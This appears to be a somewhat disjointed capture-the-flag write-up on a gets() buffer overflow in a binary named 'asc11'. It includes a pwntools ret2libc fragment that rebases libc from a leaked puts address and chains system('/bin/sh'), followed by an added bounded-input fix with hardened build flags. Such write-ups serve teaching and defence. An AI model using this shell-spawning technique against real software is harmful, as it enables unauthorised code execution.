```
file asc11
checksec asc11
```

Output (example):
```
./asc11
```

It prints "Input: ", waits for input, then exits. Open in Ghidra/IDA. The main function:
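```c
void main(void)
{
    char buf[32];

    setvbuf(stdout, NULL, 2, 0);   /* 2 == _IONBF: unbuffered stdout */
    puts("Input: ");
    gets(buf); // <-- vulnerable
}
```

gets → classic buffer overflow. No canary, PIE off → easy ret2win/ret2libc. Use gdb + pattern create (from pwntools or msf-pattern):

For the ret2libc route, the exploit script parses the leaked puts address, computes the libc base and builds the second ROP chain:

```python
# p is the pwntools process/remote tube, libc the ELF object for the target's libc
leak = u64(p.recvline().strip().ljust(8, b'\x00'))   # leaked puts address, padded to 8 bytes
libc.address = leak - libc.symbols['puts']           # rebase libc from the leak
log.success(f'Libc base: {hex(libc.address)}')
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh')))
```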
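The fix for the `gets(buf)` call in the main function above, as an added example that is not part of the original write-up or the challenge binary: a bounded line reader for the same 32-byte buffer, rebuilt with the canary and PIE the write-up notes are absent. The names `read_line_bounded` and `check_input` and the file name `fixed.c` are assumptions made for illustration.

```c
/* Added example (not the challenge's code): bounded replacement for gets(buf).
 * Build with the mitigations the write-up notes as absent (no canary, PIE off):
 *   gcc -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie fixed.c */
#include <stdio.h>
#include <string.h>

enum { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_EOF = -1 };

/* Hypothetical helper: read one line into buf[size], never writing past it.
 * An over-long line is rejected whole and consumed to its newline, so the
 * tail cannot be misread as the next line. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    size_t n = 0;
    int c, too_long = 0;
    if (size == 0) return LINE_TOO_LONG;   /* no room even for the NUL */
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < size)
            buf[n++] = (char)c;   /* always leaves room for the NUL */
        else
            too_long = 1;         /* keep consuming, stop storing */
    }
    buf[too_long ? 0 : n] = '\0';
    if (c == EOF && n == 0 && !too_long)
        return LINE_EOF;
    return too_long ? LINE_TOO_LONG : LINE_OK;
}

/* Run constructed input through the reader via a temporary file. */
int check_input(const char *data, size_t len, char *out, size_t size)
{
    FILE *f = tmpfile();
    if (f == NULL) return -2;
    fwrite(data, 1, len, f);
    rewind(f);
    int rc = read_line_bounded(f, out, size);
    fclose(f);
    return rc;
}

int main(void)
{
    char buf[32];                       /* same size as the original buffer */
    setvbuf(stdout, NULL, _IONBF, 0);
    puts("Input: ");
    if (read_line_bounded(stdin, buf, sizeof buf) != LINE_OK)
        return 1;                       /* reject instead of overflowing */
    return 0;
}
```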
Asc 11 //top\\ May 2026